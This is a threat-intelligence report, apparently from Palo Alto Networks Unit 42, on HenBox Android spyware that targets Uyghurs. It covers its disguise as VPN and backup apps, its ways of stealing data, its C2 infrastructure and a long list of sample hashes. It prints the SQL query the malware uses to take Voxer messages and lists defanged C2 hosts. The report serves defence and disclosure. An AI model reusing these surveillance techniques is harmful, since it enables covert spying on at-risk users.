Once installed, HenBox steals information from the devices from a myriad of sources, including many mainstream chat, communication, and social media apps. The stolen information includes personal and device information. Of note, in addition to tracking the compromised device’s location, HenBox also harvests all outgoing phone numbers with an “86” prefix, which is the country code for the People’s Republic of China (PRC). It can also access the phone’s cameras and microphone.

HenBox has ties to infrastructure used in targeted attacks with a focus on politics in South East Asia. These attackers have used additional malware families in previous activity dating to at least 2015 that include PlugX, Zupdax, 9002, and Poison Ivy. This also aligns with HenBox’s timeline, as in total we have identified almost 200 HenBox samples, with the oldest dating to 2015. Most of the samples we found date from the last half of 2017, fewer samples date from 2016, and a handful date back to 2015. In 2018, we have already observed a small but consistent number of samples. We believe this indicates a fairly sustained campaign that has gained momentum over recent months.

HenBox Enters the Uyghur App Store

In May 2016, a HenBox app was downloaded from uyghurapps[.]net. Specifically, the app was an Android Package (APK) file that will be discussed in more detail shortly. The domain name, language of the site and app content hosted suggest this site is a third-party app store for whom the intended users are the Uyghurs. Such app stores are so-called because they are not officially supported by Android, nor are they provided by Google, unlike the Play Store. Third-party app stores are ubiquitous in China for a number of reasons including: evermore powerful Chinese Original Equipment Manufacturers (OEM), a lack of an official Chinese Google Play app store, and a growing smartphone market.

The HenBox app downloaded in May 2016 was masquerading as the DroidVPN app. At the time of writing, the content served at the given URL on uyghurapps[.]net, is now a legitimate version of the DroidVPN app, and looks as shown in Figure 1 below.

henbox_2

Figure 1 Uyghurapps[.]net app store showing the current DroidVPN app

Virtual Private Network (VPN) tools allow connections to remote private networks, increasing the security and privacy of the user’s communications. According to the DroidVPN app description, it “helps bypass regional internet restrictions, web filtering and firewalls by tunneling traffic over ICMP.” Some features may require devices to be rooted to function and according to some 3rd party app stores, unconditional rooting is required, which has additional security implications for the device.

We have not been able to ascertain how the DroidVPN app on the uyghurapps[.]net app store was replaced with the malicious HenBox app; however, some indicators point to the server running an outdated version of Apache Web Server on a Windows 32-Bit operating system. In light of this, we believe an attack against unpatched vulnerabilities is a reasonable conjecture for how the server was compromised.

The HenBox app downloaded in May 2016, as described in Table 1 below, masquerades as a legitimate version of the DroidVPN app by using the same app name “DroidVPN” and the same iconography used when displaying the app in Android’s launcher view, as highlighted in Figure 2 below Table 1.

APK SHA256 Size (bytes) First Seen App Package name

 

App name
0589bed1e3b3d6234c30061be3be1cc6685d786ab3a892a8d4dae8e2d7ed92f7 2,740,860 May 2016 com.android.henbox DroidVPN

Table 1 Details of the HenBox DroidVPN app on the uyghurapps[.]net app store

henbox_3

Figure 2 HenBox app installed, purporting to be DroidVPN

Depending on the language setting on the device, and for this particular variant of HenBox, the installed HenBox app may have the name “Backup” but uses the same DroidVPN logo. Other variants use other names and logos, as described later.

Given the DroidVPN look and feel being used by this variant of HenBox, it’s highly likely the uyghurapps[.]net page for DroidVPN remained identical when serving either HenBox or DroidVPN apps, just that the legitimate APK file had been replaced with HenBox for an unknown period of time.

In addition to the look and feel of DroidVPN, this HenBox variant also contained a legitimate DroidVPN app within its APK package as an asset, which could be compared to a resource item within a Windows Portable Executable (PE) file. Once the HenBox app is installed and launched, it launches an install process for the embedded app as a decoy to other malicious behaviors occurring in the background, and to satisfy the victim with the app they were requesting, assuming they requested to download a particular app, such as DroidVPN.

The version of the legitimate DroidVPN embedded inside this HenBox variant is the same version of DroidVPN available for download from uyghurapps[.]net, at the time of writing. It’s worth noting, newer versions of the DroidVPN app are available on Google Play, as well as in some other third-party app stores, which could indicate uyghurapps[.]net is not awfully well maintained or updated to the latest apps available.

At the time of writing, to our knowledge no other third-party app stores, nor the official Google Play store, were or are hosting this malicious HenBox variant masquerading as DroidVPN.

The Right App at the Right Time

The malicious HenBox and embedded DroidVPN app combination is one instance of the type of legitimate apps the attackers choose to mimic to compromise their victims. These threat actors frequently offer malicious apps purporting to be legitimate apps that are broadly used or important to a targeted population. It’s worth noting however, about one-third of the HenBox apps contained embedded APK objects that did not refer to legitimate apps. Some were only 3 bytes long, containing strings such as “ddd” and “333”, or were otherwise corrupted.

Beyond the previously mentioned DroidVPN example, other viable embedded apps we found include apps currently available on Google Play, as well as many third-party app stores. Table 2 below lists some of these apps with their respective metadata.

# Parent APK SHA256 First Seen Package names

(parent APK)

[embedded APK]

APK App names

(parent APK)

[embedded APK]

1 fa5a76e86abb26e48a

f0b312f056d24000bc

969835c40b3f98e5ca

7e301b5bee

April 2016 (com.android.henbox)

[com.ziipin.software]

(Uyghurche Kirguzguch)

[Emojicon]

2 1749df47cf37c09a92

b6a56b64b136f15ec

59c4f55ec835b1e569

c88e1c6e684

May 2017 (cn.android.setting)

[com.apps.amaq]

(设置 (Backup))

[Amaq Agency]

3 4d437d1ac29b1762c

c47f8094a05ab73141

d03f9ce0256d200fc6

91c41d1b6e7

June 2017 (cn.android.setting)

[com.example.ourplayer]

(islamawazi)

[islamawazi]

Table 2 Example HenBox variants containing embedded apps

Sample 1 marks the first HenBox sample we saw embedding a legitimate app within its assets to be dropped and installed on the victim device as a decoy. The legitimate app in question was a Uyghur language keyboard app targeted at native speakers of the Uyghur language and their smartphones.

Sample 2, has the package name cn.android.setting masquerading as Android’s Settings app, which has a similar package name (com.android.settings). This variant of HenBox also used the common green Android figure as the app logo and was named 设置 (“Backup” in English). This variant’s app name, along with many others, is written in Chinese and describes the app as a backup tool. Please see the IOCs section for all app and package name combinations. Interestingly, the embedded app in sample 2 is not a version of the Android Settings app but instead the “Amaq Agency” app, which reports on ISIS related news. Reports indicate fake versions of the Amaq app exist, likely in order to spy on those that use it.

A month after observing sample 2, we obtained another which used the same package name as sample 2 (cn.android.setting). However, this time the app name for both HenBox and the embedded app were identical: Islamawazi.  Islamawazi is also known as the Turkistan Islamic Party or “TIP”. This organization was formerly known as the East Turkestan Islamic Party and is purported to be an Islamic extremist separatist organization founded by Uyghur jihadists. The embedded app appears to be a media player.

These examples, together with the HenBox app placed on a very specific third-party app store, point clearly to at least some of the intended targets of these malicious apps being Uyghurs, specifically those with interest in or association with terrorist groups. These threat actors appear to be choosing the right apps – those that could be popular with locals in the region, at the right time – while tensions grow in this region of China, to ensure a good victim install-base.

HenBox Roosts

HenBox has evolved over the past three years, and of the almost two hundred HenBox apps in AutoFocus, the vast majority contain several native libraries as well as other components in order to achieve their objective. Most components are obfuscated in some way, whether it be simple XOR with a single-byte key, or through the use of ZIP or Zlib compression wrapped with RC4 encryption. These components are responsible for a myriad of functions including handling decryption, network communications, gaining super-user privileges, monitoring system logs, loading additional Dalvik code files, tracking the device location and more.

The remainder of this section describes at a high-level what HenBox is capable of, and how it operates. The description is based on analysis of the sample described in Table 3 below, which was of interest given its C2 domain mefound[.]com overlaps with PlugX, Zupdax, and Poison Ivy malware families discussed in more detail later.

SHA256 Package Name App Name
a6c7351b09a733a1b3ff8a0901c5bde

fdc3b566bfcedcdf5a338c3a97c9f249b

com.android.henbox 备份 (Backup)

Table 3 HenBox variant used in description

Once this variant of HenBox is installed on the victim’s device, the app can be executed in two different ways:

One method for executing HenBox is for the victim to launch the malicious app (named “Backup”, in this instance) from the launcher view on their device, as shown in Figure 3 below. This runs code in the onCreate() method of the app’s MainActivity class, which in effect is the program’s entry point. This process is defined in the app’s AndroidManifest.xml config file, as shown in the following snippet.

            
                
                
            

henbox_4

Figure 3 HenBox app installed and visible on Android’s Launcher view

Doing so executes code checking if the device is manufactured by Xiaomi, or if Xiaomi’s fork of Android is running on the device. Under these conditions, the app continues executing and the intent of targeting Xiaomi devices and users could be inferred, however poorly written code results in execution in more environments than perhaps intended; further checks are made to ascertain whether the app is running on an emulator, perhaps to evade researcher analysis environments. Assuming these checks pass, one of the main ELF libraries is loaded that orchestrates other components and provides functionality to the app’s Dalvik code through the Java Native Interface (JNI).

HenBox checks whether this execution is its first by using Android’s shared preferences feature to persist XML key-value pair data. If it is the first execution, and if the app’s path does not contain “/system/app” (i.e. HenBox is not running as a system app), another ELF library is loaded to aid with executing super-user commands.

The second method uses intents, broadcasts, and receivers to execute HenBox code. Providing the app has registered an intent to process particular events from the system, and one of said events occurs, HenBox is effectively brought to life through external stimulus from another app on the system broadcasting a request, or the system itself broadcasting a particular event has occurred. These intents are typically defined statically in the app’s AndroidManifest.xml config file; some HenBox variants register further intents from their code at run-time. Once a matching intent is triggered, the respective Receiver code will be executed, leading to other HenBox behaviors being launched, which are described later. Table 4 below lists the intents that are statically registered in this HenBox variant’s AndroidManifest.xml config file, together with a description of what that intent does, and when it would be used. Depending on the intent triggered, one of two Receivers would be called, in this instance they are called Boot or Time but the name is somewhat immaterial.

Receiver Intent Name Description
BootReceiver android.intent.action.BOOT_COMPLETED System notification that the device has finished booting.
android.intent.action.restart A legacy intent used to indicate a system restart.
android.intent.action.SIM_STATE_CHANGED System notification that the SIM card has changed or been removed.
android.intent.action.PACKAGE_INSTALL System notification that the download and eventual installation of an app package is happening (this is deprecated)
android.intent.action.PACKAGE_ADDED System notification that a new app package has been installed on the device, including the name of said package.
com.xiaomi.smarthome.receive_alarm Received notifications from Xiaomi’s smart home IoT devices.
TimeReceiver android.intent.action.ACTION_TIME_CHANGED System notification that the time was set.
android.intent.action.CONNECTIVITY_CHANGE System notification that a change in network connectivity has occurred, either lost or established. Since Android version 7 (Nougat) this information is gathered using other means, perhaps inferring the devices used by potential victim run older versions of Android.

Table 4 HenBox variant’s Intents and Receivers

Most of the intents registered in the AndroidManifest.xml file, or loaded during run-time, are commonly found in malicious Android apps. What’s more interesting, and much less common, is the inclusion of the com.xiaomi.smarthome.receive_alarm intent filter. Xiaomi, a privately owned Chinese electronics and software company, is the 5th largest smart phone manufacturer in the world and also manufactures IoT devices for the home. Most devices can be controlled by Xiaomi’s “MiHome” Android app, which is available on Google Play with between 1,000,000 and 5,000,000 downloads.

Given the nature of connected devices in smart homes, it’s highly likely many of these devices, and indeed the controller app itself, communicate with one another sending status notifications, alerts and so on. Such notifications would be received by the MiHome app or any other, such as HenBox, so long as they register their intent to do so. This could essentially allow for external devices to act as a trigger to execute the malicious HenBox code, or perhaps afford additional data HenBox can collect and exfiltrate.

Either method to load HenBox ultimately results in an instance of a service being launched. This service hides the app from plain sight and loads another ELF library to gather environmental information about the device, such as running processes and apps, and details about device hardware, primarily through parsing system logs and querying running processes. The service continues by loading an ELF, created by Baidu, which is capable of tracking the device location before setting up a monitor to harvest phone numbers associated with outgoing calls for those numbers with a country code “+86” prefix, which relates to the People’s Republic of China.

Further assets are decrypted and deployed, including another Dalvik DEX code file, which has various capabilities including registering itself as the incoming SMS handler for the device to intercept SMS messages, loading another ELF library that includes a version of BusyBox – a package containing various stripped-down Unix tools useful for administering such systems – and, interestingly, is capable of turning off the sound played when the device’s cameras take pictures.

The Android permissions requested by HenBox, as defined in the apps’ AndroidManifest.xml files, range from accessing location and network settings to messages, call, and contact data. HenBox can also access sensors such as the device camera(s) and the microphone.

Beyond the Android app itself, other components such as the aforementioned ELF libraries have additional data-stealing capabilities. One ELF library, libloc4d.so, handles amongst other things the loading of the app-decoded ELF library file “sux”, as well as handling connectivity to the C2.

The sux library appears to be a customized super user (su) tool that includes code from the com.koushikdutta.superuser app and carries the equivalent of a super user (su) binary in order to run privileged commands on the system. The primary goal of sux appears to be steal messages and other data from popular messaging and social media apps specified within the HenBox sample. A similar tool, with the same filename, has been discussed in previous research but the SpyDealer malware appears unrelated to HenBox. More likely, this is a case of common attack tools being re-used between different threat actor groups.

This particular HenBox variant, as listed in Table 3 above, harvests data from two popular messaging and social media apps: Voxer Walkie Talkie Messenger (com.rebelvox.voxer) and Tencent’s WeChat (com.tencent.mm). These types of apps tend to store their data in databases and, as an example, HenBox accesses Voxer’s database from the file “/data/data/com.rebelvox.voxer/databases/rv.db”. Once opened, HenBox runs the following query to gather message information.

select 
messages.timestamp ,messages.sender,messages.body,profiles .first || profiles .last,profiles.profile_username  
from 
messages,conversations left join profiles on messages.sender=profiles.username 
where
messages.thread_id=conversations .thread_id

Not long after this variant was public, newer variants of HenBox were seen, and some had significant increases in the number of targeted apps. Table 5 describes the latest variant seen in AutoFocus.

SHA256 Package Name App Name First Seen
07994c9f2eeeede199dd6b4e760fce3

71f03f3cc4307e6551c18d2fbd024a24f

com.android.henbox 备份 (Backup) January 3rd 2018

Table 5 Recent HenBox variant with updated functionality

Table 6 contains an updated list of targeted apps from which this newer variant of HenBox is capable of harvesting data. Interestingly, the two communication apps described above as being targeted by the HenBox variant listed in Table 3 do not appear in this updated list.

Package Name App Name
com.whatsapp WhatsApp Messenger
com.pugna.magiccall n/a
org.telegram.messenger Telegram
com.facebook.katana Facebook
com.twitter.android Twitter
jp.naver.line.android LINE: Free Calls & Messages
com.instanza.cocovoice Coco
com.beetalk BeeTalk
com.gtomato.talkbox TalkBox Voice Messenger – PTT
com.viber.voip Viber Messenger
com.immomo.momo MOMO陌陌
com.facebook.orca Messenger – Text and Video Chat for Free
com.skype.rover Skype; 3rd party stores only

Table 6 Targeted apps from a newer HenBox variant

Most of these apps are well established and available on Google Play, however, com.skype.rover appears to be available only on third-party app stores. The same is likely to be the case for com.pugna.magiccall but this is unknown currently.

It’s clear to see that the capabilities of HenBox are very comprehensive, both in terms of an Android app with its native libraries and given the amount of data it can glean from a victim. Such data includes contact and location information, phone and message activity, the ability to record from the microphone, camera, and other sensors as well as the capability to access data from many popular messaging and social media apps.

Infrastructure

While investigating HenBox we discovered infrastructure ties to other malware families associated with targeted attacks against Windows users – notable overlaps included PlugX, Zupdax, 9002, and Poison Ivy. The overall image of these ties is below in Figure 5 and paints a picture of an adversary with at least 5 malware families in their toolbox dating back to at least 2015.

henbox_5

Figure 5. HenBox and related malware and C2s

The overlap between the HenBox and 9002 malware families Unit 42 has seen involves three shared C2s between several samples; the first IP below is used for more than half of the HenBox samples we have seen to date:

  • 47.90.81[.]23
  • 222.139.212[.]16
  • lala513.gicp[.]net

The overlaps between the Henbox, PlugX, Zupdax, and Poison Ivy malware families involves a web of shared C2s and IP resolutions centered around the below:

  • 59.188.196[.]172
  • cdncool[.]com (and third-levels of this domain)
  • www3.mefound[.]com
  • www5.zyns[.]com
  • w3.changeip[.]org

Ties to previous activity

The registrant of cdncool[.]com also registered six other domains. To date, Unit 42 has seen four of the seven (the first three in the list below, along with cdncool[.]com) used in malicious activity and it is reasonable to assume the remaining three are or were intended to serve the same purpose.

  • tcpdo[.]net
  • adminsysteminfo[.]com
  • md5c[.]net
  • linkdatax[.]com
  • csip6[.]biz
  • adminloader[.]com

Unit 42 published a blog in July 2016 about 9002 malware being delivered using a combination of shortened links and a file hosted on Google Drive. The spear phishing emails had Myanmar political-themed lures and, if the 9002 C2 server responded, the Trojan sent system specific information along with the string “jackhex”. “jackhex” has also been part of a C2 for what is likely related Poison Ivy activity detailed below, along with additional infrastructure ties.

The C2 for the aforementioned 9002 sample was logitechwkgame[.]com, which resolved to the IP address 222.239.91[.]30. At the same time, the domain admin.nslookupdns[.]com also resolved to the same IP address, suggesting that these two domains are associated with the same threat actors. In addition, admin.nslookupdns[.]com was a C2 for Poison Ivy samples associated with attacks on Myanmar and other Asian countries discussed in a blog published by Arbor Networks in April 2016. Another tie between the activity is the C2 jackhex.md5c[.]net, which was also used as a Poison Ivy C2 in the Arbor Networks blog. “jackhex” is not a common word or phrase and, as noted above, was also seen in the beacon activity with the previously discussed 9002 sample. Finally, since publishing the 9002 blog, Unit 42 has also seen the aforementioned 9002 C2 used as a Poison Ivy C2 with a Myanmar political-themed lure.

In our 9002 blog we noted some additional infrastructure used either as C2s for related Poison Ivy samples, or domain registrant overlap with those C2 domains. When we published that blog Unit 42 hadn’t seen any of the three registrants overlap domains used in malicious activity. Since then, we have seen Poison Ivy samples using third-levels of querlyurl[.]com, lending further credence the remaining two domains, gooledriveservice[.]com and appupdatemoremagic[.]com are or were intended for malicious use.  While we do not have complete targeting, information associated with these Poison Ivy samples, several of the decoy files were in Chinese and appear to be part of a 2016 campaign targeting organizations in Taiwan with political-themed lures.

Conclusion

Typically masquerading as legitimate Android system apps, and sometimes embedding legitimate apps within them, the primary goal of the malicious HenBox appears to be to spy on those who install them. Using similar traits, such as copycat iconography and app or package names, victims are likely socially engineered into installing the malicious apps, especially when available on so-called third-party (i.e. non-Google Play) app stores which often have fewer security and vetting procedures for the apps they host. It’s possible, as with other Android malware, that some apps may also be available on forums, file-sharing sites or even sent to victims as email attachments, and we were only able to determine the delivery mechanism for a handful of the apps we have been able to find.

The hosting locations seen for some HenBox samples, together with the nature of some embedded apps including: those targeted at extremist groups, those who use VPN or other privacy-enabling apps, and those who speak the Uyghur language, highlights the victim profile the threat actors were seeking to attack. The targets and capabilities of HenBox, in addition to the ties to previous activity using four different Windows malware families with political-themed lures against several different South East Asian countries, indicates this activity likely represents an at least three-year-old espionage campaign.

Palo Alto Networks customers are protected by:

AutoFocus customers can investigate this activity using the following tag. To date we believe HenBox is not a shared tool, however, the remainder of malware used by these attackers is shared amongst multiple groups:

Android Hygiene

Update: Keep installed apps updated. Much like patching Operating System and application files on PCs, Android and apps developed for the platform also receive security updates from Google and app developers to remove vulnerabilities and improve features, including security.

Review: App permissions to see what the app is potentially capable of. This can be quite technical, but many permissions are named intuitively describing if they intend to access contacts, messages, or sensors, such as the device microphone or camera. If you the permission seem over the top compared to the described functionality, then don’t install. Also read the app and developer reviews to evaluate their trustworthiness.

Avoid: Third-party app stores that may host pirated versions of paid apps from the Google Play app store, often such apps include unwanted extra features that can access your sensitive data or perform malicious behaviors. Also avoid rooting devices, if possible, as apps could misuse this power.

IOCs

Most recent samples first:

sha256 apk_package_name apk_app_name apk_app_name_en
446734590904c5c44978e4646bbbc629d98236c16e29940b32100c1400aebc88 com.android.henbox 备份 Backup
ea0786bfe145d8c763684a2fdf2eb878da29c1b6ae5aacd1a428c9ffead4bad8 com.android.vivibox 备份服务 Backup service
16bb6ff97999b838a40b66146ff4c39b9c95906f062c6fe1e3077e6e30171a4d com.android.vivibox 备份 Backup
0fa384198ae9550e008e97fa38e8a56c4398fc91e12eddba713966bfed107130 com.android.henbox 备份 Backup
e835e4907c9ff07a3a8281530552eaed97d9dea5b182d24a8db56335bad5213d com.android.cicibox 备份服务 Backup service
9192602e5a3488c322025991ca7abcbdc8f916e08f279004a94cec8eb9f220b4 com.android.vivibox 备份 Backup
9b57ab06650a137a5962b85ca9ae719e9c3956d68938a6a2425dffe8d152941a com.android.webbox 备份服务 Backup service
7bf0e70fb4ffca19880fecdeb7e7e5d0fb4681064a98c71056cbb29c80ed6119 com.android.henbox 备份 Backup
51cfc1a658e63624706a6bb2ed2baa63c588e7ce499bd116a3d5752743fefb54 com.android.henbox 备份 Backup
3417899195780c8186356d49bc53b600b3b0e49aae83d9aeb27e518b6964be04 com.android.henbox 备份 Backup
f0fd8c5f4487df7592e5b7fa02f19f23d3ad43f5aaab84257cc560bf5ea76f1e com.android.henbox 备份 Backup
a6c1da9559d72563848802ed14a7421515009c2a0ffb85aab74c6e42584c222d com.android.cicibox 备份服务 Backup service
bf0ab0362ee39191587921b75ab92bf6da12e377dbfdf4f7a053c1217841bdfc com.android.vivibox 备份服务 Backup service
f5abd5e7e325f16df3e96ff55a19ebf524f40f9ade76003355eb1d68bc084006 com.android.vivibox 备份 Backup
201eca94a9e8023d021a2b4a1517c4e46cd01e3be323bc46660c1c6f42aa6abf com.android.henbox 备份 Backup
7b7887d4ad7cab0c53d6f8557bbdf616985f3434ba536a5683f6fba604151d04 com.android.henbox 备份 Backup
4eb768b52b687de49c7da8845bbd7671e2e076fe64bf23596a409108ef3fbbbc com.android.henbox 备份 Backup
a7cfae9b12542b293d8265770a10946d422736d6f716af17f7b963603e422c51 com.jrzheng.supervpn.view SuperVPN SuperVPN
3c2109adf469bfc6c320ac824355f97a2b0f5ff01891d1affcd1a5b017c97195 com.android.webbox 备份服务 Backup service
2a7e456d2700ba13af48efdcf1f699bf51b6901a3ba5c80c009aaaca86235e5d com.android.henbox 备份 Backup
3d525435cbd88b4f1f97e32e2c6accf7855f4cc576ecbd87ad05a05ddd2d2f79 com.android.vivibox 备份服务 Backup service
5a999904b2f03263a11bcc077ad179333b431fb9e6e8090f371d975ba188e55e com.android.cicibox 备份服务 Backup service
4d1e37e5840e8a4d5ae0f60cf33c593f595af200fbf998c3af809fd0c225c475 com.android.henbox 备份 Backup
3cce965887d4677069cb9160d7c7c122087a5f434e095a9f0848c3e838bca9f5 com.android.henbox 备份 Backup
8095cf4f6aec1983bd9f81ca85c1b27415e200b315f757613afb4f0334c99f0b com.android.henbox 备份 Backup
b098be6fd1859ee70ef123c59d5e2a1db435f990c9378b41af0c005f76ba24f2 com.android.henbox 备份 Backup
56c1e23b12e83573440019084b9ce39f8f5ddd9d6de51edaf1f83e020fc648a0 com.android.cicibox 备份服务 Backup service
75fef2a0f05ae2ad971b01041fd3ed5ceacce306d78930bc2eba190c39799bc7 com.android.henbox 备份 Backup
a3deca8203792d4b34242e8f5d0f7e2e3d054f08d74885ab7ff6f3a6f4b2578a com.android.henbox 备份 Backup
77b6e8cd1e6de9ee22bf0e9d735089ae24134ab955f0975d4febc9ed6b60af38 com.android.henbox 备份 Backup
9f8909b1615aaa0fed38ad27162ccf3437e2eaa59cb0c990261c866f075c4113 com.android.henbox 备份 Backup
7ffc1afd5749e7731f4161a6348205555e5892f1bd3446b6d0c5e7bbaa5917e3 com.android.henbox 备份 Backup
a1644194faac76a1d49fd96b875a3f9026993e9f21f6dbc50dc59aeb5e7dac4b com.android.henbox 备份 Backup
2e4aa7777ba449071b90c0c13b803ddf6c6f10576eb9806acde6c3d1391db463 com.android.henbox 备份 Backup
af2d44e36cc28727e29b0d9aecb4b17534a195faacbf4192ce1483a9bde65edc com.android.henbox 备份 Backup
5010236b481d8d2ebc45ee95154f10ffbb317eced86401486f63276520049896 com.android.henbox 备份 Backup
8de4e886b69046c2942e26d8b2f436695ca27060f6a74c797c620502f87887c9 com.android.henbox 备份 Backup
fed084773542120fe77b880fc136bd20979cddc286b75b651d01aa6e32234b2d com.android.henbox 备份 Backup
43ce0c3e63de64f032ea7d4ca77c4b40b86d57e1d237f771b21c1f9c8f41eafb com.android.henbox 备份 Backup
6e1812f7bf313552bc60b6be5b46bdfd44582775e3cb19cf6a231a903aec508b com.android.henbox 备份 Backup
7774432c67f3d3688a1a1b21edc0a73d9d47990cc1f132663b0010ff4bbd6e87 com.android.henbox 备份 Backup
59ca2754279d9cba40334c35907e2e1fc6fd2888b2c180e5b0b8d73accbb40f2 com.android.henbox 备份 Backup
2c5934db000a2838d42cf705453e29d16f4d4bb462fa65e134ce78b4266cefee com.android.henbox 备份 Backup
e326501a0fb15bf19ac135f501b84caa2587d1fb2cad9e034f1756898686dab4 com.android.henbox 备份 Backup
14f715228acff7d8bad057e4bf996635d76ab41ae25ca8a3f90196caeb241446 com.android.henbox 备份 Backup
2be931f008a9ea62aa35091eb9a5629824e81499ce7a5219101ccd39a02ecdec com.android.henbox 备份 Backup
51db059a833377666f92f64ae1e926b83da8821876c66949e320b55c1a929ff8 com.android.henbox 备份 Backup
dee79253deaaa57af0fddb2c8ec5d4cc0546dfe3c1d05c2916a44a37eef3d9f8 com.android.henbox 备份 Backup
ec2e060ac633978b9b700aa95784255b9796f4fb51c188b1c79d5947df07bf98 com.android.henbox 备份 Backup
a6c7351b09a733a1b3ff8a0901c5bdefdc3b566bfcedcdf5a338c3a97c9f249b com.android.henbox 备份 Backup
ae5598ccb3f2f31d2ec967808988a47d6ce4d1cd5e6808d1194ee93c6400039c com.android.henbox 备份 Backup
6f5e7f6ca2f25667d5fe55d7e8ec1b816d6db8b31cb28dff43b4f2f73d70ecdb com.android.henbox 备份 Backup
4cbb5a0d9b6f64dc9d8dd9aaac5651649e24b2cd7248eb9db32191102559ab9c com.android.henbox 备份 Backup
c375aad52c292b4d5c4efb02a33e2325a27f27158bb13c048f533a2a9d0837fb com.android.henbox 备份 Backup
779b09c61951818e5afb47c369fe9b5fa7b7f6139f589f14b3042b2ac96809d8 com.android.henbox 备份 Backup
7ba216b88f84c9a0ce90ca5500ddc2e80100b23ef3784d133b69870768f1e3bc com.android.henbox 备份 Backup
077239b3bedaa850b82204fdd42e5e45fedc3dfc2f6da5aab04d768370e990fa com.android.henbox 备份 Backup
be548c26d0863b812948a16f982e96557319346fad897f67dc7873108203fdce com.android.henbox 备份 Backup
54366ee485b43cea10624d62247a48b12c1ce35c49295491f7fbb6323c68da7b com.android.henbox 备份 Backup
51714b8f34db94cbd8916374af4d8e63b56ef41fa819d2d697f1a3975a32960e com.android.henbox 备份 Backup
48f38b671847bfba3810b74d1d815c2bb4cc94392b98e1f59f95e748eb410465 com.android.henbox 备份 Backup
d0e58c3e9d881f875532d1bb8bee63e4ac8728458708361f754db97fba6be22e com.android.henbox 备份 Backup
8b78f469f3eda0cb02cfbf5598f0a7449cb63b7181d7fd5037ebb9cb8aff30a4 com.android.henbox 备份 Backup
49556e972a35c9d592bf64ab37056f6da356b2061c1ce269d9c3af73978756d9 com.android.henbox 备份 Backup
1d4dadae0c696fde2fef99eb99188509dc0d5fbac7ee07d4f0d5a92dcc922ad7 com.android.henbox 备份 Backup
3c62d00a9740c49cf01fb7635260ff71e0ac44cf80da749ca4101869120f2233 com.android.henbox 备份 Backup
993692d5540c40614f4da430cf4cea64a7e0e7f950452abae19bf608afdf20a6 com.android.henbox 备份 Backup
3e026154767b6a101d3a852946e9eb3ed1c96662490afe9b601469a8459e325b com.android.henbox 备份 Backup
6a518d29232d3f68aa5c78df4a8d212f924e03379dc2be0a388b3118779fe583 com.android.henbox 备份 Backup
70512a566f33c636ad071d18e82db89f9531a6133be89b7d3f18fc9f7730b078 com.android.henbox 备份 Backup
53238af90efd8531686432245c516db04cd163584a811d6e5835a42fe738fbab com.android.henbox 备份 Backup
2f2277898f34a91a365f1a090d72678768c5e420c8350f340cc4b4602cd8a710 com.android.henbox 备份 Backup
b48edd2270b1aeb014291eb3ac2aaa1d4b7ee4694965d0de2c0978b2feae946d com.android.henbox 备份 Backup
45e7dc9c0e33d4754384365a60604c66d72356a994cbed8e8eab8796cf1579e2 com.android.henbox 备份 Backup
a1e465d905434d5dae3bb7acb7c148ef8ed0d341a6d9121d09adbc126cc3a907 com.android.henbox 备份 Backup
4d437d1ac29b1762cc47f8094a05ab73141d03f9ce0256d200fc691c41d1b6e7 cn.android.setting islamawazi islamawazi
d29646f2c665ef91c360e24242c634ee9051d4ab01cb8f87265088e47f41d690 com.android.henbox 备份 Backup
2345a56d61e052af3265ee0fae47b22f1551ede4eee45bca30ad5fb9fac7a922 com.android.henbox 备份 Backup
44388ec38ee36177d6804d778ee554b2d063db3b88d7480eca6587ff68a15982 com.android.henbox 备份 Backup
286bd20f3ea944703c8c87e66708d6b32046a640863afba7f3c4c72dc28d37d1 cn.android.seting 设置 Setup
7f28caeaa484496f85c80580cd88671961149aae2295c8777becb2970455504c com.android.henbox 备份 Backup
89ef65813bccb8197da4af68ba8f9e8e123f3aad4ed41736f8039ad2c6817a25 com.android.henbox 备份 Backup
1749df47cf37c09a92b6a56b64b136f15ec59c4f55ec835b1e569c88e1c6e684 cn.android.setting 设置 Setup
5f16c23f92a10de59efc9a081e0c79458faa3fabb24a1356dbfff7cea8611a3e com.android.henbox 备份 Backup
66eec9ffa2906e56656e649d5b632526e829d7142a75cd27a006bf82775e8c45 com.android.henbox 备份 Backup
a728c653b9c7be4b058eff329afb826db755fdddc4e10ba67191816db7dbeac0 cn.android.setting 爱奇艺 IQIYI
c4ee98d58d38f6109d843955277f1a37bfb138a14113c6cb38bcb6eb857d4977 cn.android.setting 设置 Setup
577ed81e07b62d9c363c505271d1f2a81592a69e1a60a82fbe8fff16e7d3419d cn.android.setting 设置 Setup
b8f785a6581bf438b1947e498b8f2255607440347d8f8b5cb31f3b98427330e6 cn.android.setting 设置 Setup
5a3c44a6e8c8e02e69caa430f41ec80b94740d099bbcfbf39cf08280fc6e16bb com.android.henbox WJ VPN WJ VPN
184e5cbebef4ee591351cfaa1130d57419f70eb95c6387cb8ec837bd2beb14d6 com.android.henbox 备份 Backup
efa3cd45e576ef8ab22d40fc9814456d06a6eeeaeada829c16122a39cb101dbf com.android.henbox 备份 Backup
9d85be32b54398a14abe988d98386a38ce2d35fff91caf1be367f7e4b510b054 com.android.henbox 备份 Backup
a8ea1140a739b2aeeb838d7fe2c073cb834bce46db22071022bd181a59422af1 com.android.henbox 备份 Backup
80a35bcbce326d05dd74ed05560db41a0f9471c4922fc9fe88d0b1a94c3cb1ae cn.android.setting 设置 Setup
0e31575bf0001d818d87aa134e728f62e7f2d27ff9437897303eb8ae1962a865 cn.android.setting 设置 Setup
d3dd162e7dee6022826e7fef23cb84f17a948d2761013a09943f165f378197e0 cn.android.setting 设置 Setup
3b345ffe7fac9aef0c9e0be3f01e8f9e1f3e0442849cc0e3f979b9866465b6bc cn.android.setting 设置 Setup
0a4f38a83abbbab3a039be95862df7848f28513baa1da52a74a9e6a31f63c9b7 com.android.henbox 备份 Backup
a267176bdc1779b19fde2e38f5f062478e8cf173582e38a26538512d64d85ecd cn.android.setting 设置 Setup
7603126f04e9e7cff828aabc060349d6dfbd76e795df7b0e798b3b0914ad13a0 com.android.henbox 备份 Backup
1da0e30b4b2ad2626a3f069f0f50f81d29b789d41385db26d7c84da3af02cd1c com.android.henbox 备份 Backup
ddea532ef46abb9bfa77acdbd38155d9a92381f777fe4c797967203578aa0966 com.android.henbox 备份 Backup
a89bdb4fd54b9488fd6f2685a4dcfa1c106d4ac9f9fb8f8992e557e306184f1a com.android.henbox 备份 Backup
b0bbcee232f27a1b366f8a7ed1d2c3056f9a67fa70e42c1fa7cfb7c778df8cb5 cn.android.setting 设置 Setup
bf16b9f012e1a0724f95a0e61a8748be3c9fc3fe3bb5a82bf3efd9b8211591fb cn.android.setting 设置 Setup
